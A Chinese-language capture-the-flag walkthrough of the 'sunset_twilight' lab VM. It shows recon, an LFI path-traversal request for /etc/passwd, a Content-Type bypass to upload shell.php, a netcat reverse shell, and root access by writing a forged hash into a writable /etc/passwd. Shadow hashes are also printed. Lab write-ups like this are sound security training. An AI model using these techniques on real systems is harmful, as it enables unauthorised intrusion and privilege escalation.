sunset_twilight 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.133      
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-03 09:33 EDT
Nmap scan report for 192.168.56.133
Host is up (0.00010s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
8080/tcp  open  http-proxy
63525/tcp open  unknown
MAC Address: 08:00:27:64:77:9F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 8.74 seconds

开的端口还挺多的，猜测可能会有兔子洞

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ sudo nmap -sT -sV -sC -O -p22,25,80,139,445,2121,3306,8080,63525 192.168.56.133
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-03 09:35 EDT
Nmap scan report for 192.168.56.133
Host is up (0.00035s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 43:e9:45:ec:f4:5b:ed:e9:64:47:43:43:39:96:9d:c9 (RSA)
|   256 ed:67:ad:31:04:17:ef:cf:75:02:05:db:88:94:97:a0 (ECDSA)
|_  256 ed:41:e5:d1:b2:23:2c:d5:90:59:2a:37:8b:da:31:c1 (ED25519)
25/tcp    open  smtp        Exim smtpd 4.92
| smtp-commands: twilight Hello nmap.scanme.org [192.168.56.106], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  ��_      Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--   1 root     root           35 Jul 16  2020 22253251-65325.twilight
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.133:2121
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
3306/tcp  open  mysql       MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 39
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, DontAllowDatabaseTableColumn, FoundRows, Speaks41ProtocolOld, ODBCClient, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, LongColumnFlag, Speaks41ProtocolNew, SupportsTransactions, InteractiveClient, SupportsCompression, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: f&&*BM;})N.9s\P^ea7/
|_  Auth Plugin Name: mysql_native_password
8080/tcp  open  http        PHP cli server 5.5 or later
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Login - powered by Easy File Sharing Web Server
63525/tcp open  http        PHP cli server 5.5 or later
|_http-title: Login - powered by Easy File Sharing Web Server
MAC Address: 08:00:27:64:77:9F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: twilight; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -2s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: twilight
|   NetBIOS computer name: TWILIGHT\x00
|   Domain name: \x00
|   FQDN: twilight
|_  System time: 2023-08-03T09:36:22-04:00
|_nbstat: NetBIOS name: TWILIGHT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2023-08-03T13:36:22
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.69 seconds

整理下信息：Debian 操作系统；smtp 邮件服务；139, 445 smb 服务；21 ftp 服务支持匿名登陆不过只有一个文件；MySQL 服务；80, 8080, 63525 Web 服务

smb 渗透

尝试看看 smb 服务是否共享了目录

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ sudo smbmap -H 192.168.56.133 
[sudo] password for kali: 
[+] IP: 192.168.56.133:445      Name: 192.168.56.133                                    
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        WRKSHARE                                                READ ONLY       Workplace Share. Do not access if not an employee.
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.5-Debian)

尝试连接 WRKSHARE 目录

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ smbclient //192.168.56.133/WRKSHARE
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul  8 18:57:09 2020
  ..                                  D        0  Wed Jul  8 18:57:09 2020
  root                                D        0  Thu Jul 16 09:50:46 2020
  run                                 D        0  Thu Aug  3 09:29:50 2023
  lost+found                          D        0  Wed Jul  8 18:08:46 2020
  initrd.img                          N 25814661  Wed Jul  8 18:58:16 2020
  etc                                 D        0  Thu Jul 16 09:54:54 2020
  proc                                D        0  Thu Aug  3 09:29:52 2023
  vmlinuz                             N  5274864  Sun Jun  7 11:42:22 2020
  initrd.img.old                      N 25807574  Wed Jul  8 18:58:02 2020
  opt                                 D        0  Wed Jul  8 18:09:01 2020
  srv                                 D        0  Wed Jul  8 18:09:01 2020
  sys                                 D        0  Thu Aug  3 09:36:49 2023
  lib64                               D        0  Wed Jul  8 18:09:08 2020
  sbin                                D        0  Thu Jul 16 09:53:39 2020
  media                               D        0  Wed Jul  8 18:08:46 2020
  bin                                 D        0  Thu Jul 16 08:22:20 2020
  usr                                 D        0  Wed Jul  8 18:09:01 2020
  lib32                               D        0  Wed Jul  8 18:08:56 2020
  dev                                 D        0  Thu Aug  3 09:29:44 2023
  lib                                 D        0  Wed Jul  8 22:20:29 2020
  vmlinuz.old                         N  5274864  Mon Apr 27 01:05:39 2020
  libx32                              D        0  Wed Jul  8 18:08:56 2020
  home                                D        0  Wed Jul  8 19:15:56 2020
  mnt                                 D        0  Wed Jul  8 18:09:01 2020
  var                                 D        0  Wed Jul  8 20:03:27 2020
  boot                                D        0  Wed Jul  8 19:06:53 2020
  tmp                                 D        0  Thu Aug  3 09:34:44 2023

                7158264 blocks of size 1024. 4447488 blocks available

看样子似乎挂载在了根目录，那就是说我们相当于获得了基础的文件系统读取的权限（或许还能上传）

尝试去看了看 home 目录，发现了一个用户 miguel 但是没有读取此用户家目录的权限

接下来考虑去看看网站目录

smb: \var\www\html\> ls
  .                                   D        0  Thu Jul 16 09:43:26 2020
  ..                                  D        0  Wed Jul 15 21:44:37 2020
  current.php                         N      152  Wed Jul 15 21:58:35 2020
  lang.php                            N       58  Wed Jul 15 22:03:45 2020
  gallery                             D        0  Wed Jul  8 22:31:53 2020
  index.php                           N      228  Wed Jul 15 22:03:51 2020

                7158264 blocks of size 1024. 4447472 blocks available

将上述文件依次下载到本地，然后开始观察文件中的代码，同时结合浏览器的显示来辅助判断

本地文件包含

lang.php 是比较有意思的，代码如下所示

<?php

$lang = $_GET['lang'];

include('./' . $lang);

?>

应当是存在文件包含的，尝试本地文件包含，构造 PoC

http://192.168.56.133/lang.php?lang=../../../../../../../etc/passwd

的确可以访问 passwd 文件但是无法访问 shadow 文件

文件上传

而 gallery 文件夹中是上传文件的，浏览器中的显示如下

结合通过 smb 下载的文件来进行简单的代码审计，在 maxlmageUpload.class.php 的第 117 行找到了关于文件上传类型的判断

//Check image type. Only jpeg images are allowed
          if ( (($_FILES['myfile']['type'])=='image/pjpeg') || (($_FILES['myfile']['type'])=='image/jpeg')) {

只是很简单地检查了 Content-Type，那我们可以上传一个真正的 jpg 文件，并使用 burp suite 抓包，再将其中的文件名和文件内容进行修改

可以在 Response 体中看到上传成功的文件名，回到 smb 命令行中，获取文件路径的相关信息

smb: \var\www\html\gallery\> cd original
smb: \var\www\html\gallery\original\> ls
  .                                   D        0  Thu Aug  3 21:54:42 2023
  ..                                  D        0  Wed Jul  8 22:31:53 2020
  sandwich.jpg                        N   171858  Thu Aug  3 21:53:06 2023
  espresso.jpg                        N   170467  Thu Aug  3 21:53:17 2023
  shell.php                           N     3611  Thu Aug  3 21:54:42 2023

尝试直接访问 http://192.168.56.133/gallery/original/shell.php，如果不成功的话，可以结合刚才的本地文件包含漏洞来进一步尝试。

反弹 shell

提前开启监听后，访问链接就实现了反弹 shell

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ sudo nc -lvnp 443 
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.133] 49904
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 21:55:35 up 12:25,  0 users,  load average: 0.00, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can\'t access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:64:77:9f brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.133/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 433sec preferred_lft 433sec
    inet6 fe80::a00:27ff:fe64:779f/64 scope link 
       valid_lft forever preferred_lft forever
$ uname -a
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@twilight:/$

提权

尝试访问 home 目录，依然无法访问 miguel 家目录，进行基础的信息收集

www-data@twilight:/var/www/html/gallery$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

定时任务没有收获

www-data@twilight:/var/www/html/gallery$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
miguel:x:1000:1000:,,,:/home/miguel:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
Debian-exim:x:107:115::/var/spool/exim4:/usr/sbin/nologin
mysql:x:108:118:MySQL Server,,,:/nonexistent:/bin/false

passwd 刚才就通过本地文件包含读取了，并没有密码和更多信息存在。

SUID 文件呢

www-data@twilight:/var/www/html/gallery$ find / -type f -perm -04000 -ls 2>/dev/null
<allery$ find / -type f -perm -04000 -ls 2>/dev/null
   146212   1156 -rwsr-xr-x   1 root     root      1181384 May 13  2020 /usr/sbin/exim4
   131131     56 -rwsr-xr-x   1 root     root        54096 Jul 27  2018 /usr/bin/chfn
   131136     64 -rwsr-xr-x   1 root     root        63736 Jul 27  2018 /usr/bin/passwd
   131134     84 -rwsr-xr-x   1 root     root        84016 Jul 27  2018 /usr/bin/gpasswd
   131132     44 -rwsr-xr-x   1 root     root        44528 Jul 27  2018 /usr/bin/chsh
   135085     36 -rwsr-xr-x   1 root     root        34888 Jan 10  2019 /usr/bin/umount
   135083     52 -rwsr-xr-x   1 root     root        51280 Jan 10  2019 /usr/bin/mount
   145984    156 -rwsr-xr-x   1 root     root       157192 Feb  2  2020 /usr/bin/sudo
   134602     44 -rwsr-xr-x   1 root     root        44440 Jul 27  2018 /usr/bin/newgrp
   134749     64 -rwsr-xr-x   1 root     root        63568 Jan 10  2019 /usr/bin/su
   135376     52 -rwsr-xr--   1 root     messagebus    51184 Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   145807    428 -rwsr-xr-x   1 root     root         436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
   268427     12 -rwsr-xr-x   1 root     root          10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   277300     12 -rwsrwxrwx   1 www-data www-data      10854 Dec 28  2010 /var/www/html/gallery/maxImageUpload.zip
   277312      4 -rwsrwxrwx   1 www-data www-data        534 Mar 19  2008 /var/www/html/gallery/readme.txt
   277308      4 -rwsrwxrwx   1 root     root           1286 Nov 27  2007 /var/www/html/gallery/style/images/ok.gif
   277304      4 -rwsrwxrwx   1 root     root            455 Nov 27  2007 /var/www/html/gallery/style/images/header_bg.gif
   277306      4 -rwsrwxrwx   1 root     root            579 Nov 27  2007 /var/www/html/gallery/style/images/header_right.gif
   277303      4 -rwsrwxrwx   1 root     root            511 Nov 27  2007 /var/www/html/gallery/style/images/button.gif
   277305      4 -rwsrwxrwx   1 root     root           1581 Nov 27  2007 /var/www/html/gallery/style/images/header_left.gif
   277307      4 -rwsrwxrwx   1 root     root           1333 Nov 27  2007 /var/www/html/gallery/style/images/nok.gif
   277309      4 -rwsrwxrwx   1 root     root           3191 Nov 27  2007 /var/www/html/gallery/style/style.css
   277310     12 -rwsrwxrwx   1 www-data www-data       8916 Mar 19  2008 /var/www/html/gallery/maxImageUpload.class.php
   277311      4 -rwsrwxrwx   1 www-data www-data        601 Mar 18  2008 /var/www/html/gallery/index.php

看到其中有 SUID 文件甚至是所有人都可读可写可执行，尝试修改将 /bin/bash 写入进去

www-data@twilight:/tmp$ echo '/bin/bash'> /var/www/html/gallery/style/style.css
< '/bin/bash'> /var/www/html/gallery/style/style.css
www-data@twilight:/tmp$ ls -alih /var/www/html/gallery/style/style.css 
ls -alih /var/www/html/gallery/style/style.css
277309 -rwxrwxrwx 1 root root 10 Aug  3 23:26 /var/www/html/gallery/style/style.css

遇到了非常奇怪的事情，SUID 文件的 S 权限消失了，问了问 chatgpt

还是没搞清楚，又拿了个文件进行上述操作，发现 SUID 依然会消失，那就只能再找别的攻击路径

尝试 MySQL 无密码登录

┌──(kali㉿kali)-[~/Downloads/sunset_twilight]
└─$ mysql -u root -h 192.168.56.133 -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 55
Server version: 10.3.22-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
3 rows in set (0.001 sec)

其中没有感兴趣的库。尝试 ftp 匿名登陆，但是的确只有那一个文件，下载后打开

好像是乱码，不太像有效字符，先搁置吧

接下来在各处翻了翻文件，还是没思路，使用 linpeas 来辅助信息收集

我将感兴趣的信息整理到下面

Sudo version 1.8.27

[CVE-2019-13272] PTRACE_TRACEME
Exposure: highly probable

/usr/bin/crontab
@reboot /usr/bin/php -S 0.0.0.0:8080 -t /var/tmp/efs
@reboot /usr/bin/python -m pyftpdlib -w -p 2121 -d /var/tmp/ftp


Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...) 

/var/lib/samba/private/secrets.tdb

passwd file: /etc/pam.d/passwd                                         
passwd file: /usr/share/lintian/overrides/passwd

-rw-r--r-- 1 root root 69 Jul  5  2020 /etc/php/7.3/mods-available/ftp.ini
-rw-r--r-- 1 root root 69 Jul  5  2020 /usr/share/php7.3-common/common/ftp.ini

/etc/passwd is writable

root:$6$ToxjigfMAQqy04Ju$KWxn7uPKThd8Aq7DDzmc4UP9/s70E1NF3ouxchGaEsmYF7mekSHrD.ffKkGjLC1gp1nkfq/Z1.O2tH12SehhM1:18451:0:99999:7:::
miguel:$6$B45OA9E8qgti4kkO$d8d7szJSGY9x5x5tSzyggQkKK0Zx.dEksrxg33JcFGJqW2S1K9lQlhU56Q4Y3RI9/m4Gra78Cidi1C6dqvJpe1:18451:0:99999:7:::

一开始我没有注意到 passwd 文件可写的情况，而是盯着 shadow 哈希，使用 john 破解的结果是用户名和密码一致，但是使用 ssh 登录和 su 命令都提示密码错误

我又试了以下直接读取 shadow 文件发现并没有成功，提示没有权限，不知道 linpeas 是怎么拿到的哈希值。

可写 passwd 提权

反复查看 linpeas 的输出，终于发现了 passwd 可写的提示，那我们可以本地生成密码哈希，然后写入到 passwd 文件中

先备份已有的 passwd 文件

www-data@twilight:/tmp$ cp /etc/passwd /tmp/passwd.bak
cp /etc/passwd /tmp/passwd.bak

使用 openssl 命令生成密码哈希

www-data@twilight:/tmp$ openssl passwd 123456      
openssl passwd 123456
5vz6eychoQ1Vc

可以构造出 root:5vz6eychoQ1Vc:0:0:root:/root:/bin/bash 但由于交互性比较差，编辑错了一次，幸好备份，正好用上了，写入使用 su root 输入设定的 123456 密码登录成功

www-data@twilight:/tmp$ su root
su root
Password: 123456

root@twilight:/tmp# whoami
whoami
root
root@twilight:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@twilight:/tmp# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:64:77:9f brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.133/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 373sec preferred_lft 373sec
    inet6 fe80::a00:27ff:fe64:779f/64 scope link 
       valid_lft forever preferred_lft forever
root@twilight:/tmp# uname -a
uname -a
Linux twilight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux

拿一下 flag

root@twilight:~# ls
ls
root.txt
root@twilight:~# cat root.txt
cat root.txt
(\ 
\'\ 
 \'\     __________  
 / '|   ()_________)
 \ '/    \ ~~~~~~~~ \
   \       \ ~~~~~~   \
   ==).      \__________\
  (__)       ()__________)


34d3ecb1bbd092bcb87954cee55d88d3

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
root@twilight:~# cd /home/
cd /home/
root@twilight:/home# ls
ls
miguel
root@twilight:/home# cd miguel
cd miguel
root@twilight:/home/miguel# ls
ls
efs  efs2  ftp  user.txt
root@twilight:/home/miguel# cat user.txt
cat user.txt
6b963e69f7b4a6205513973e4cace702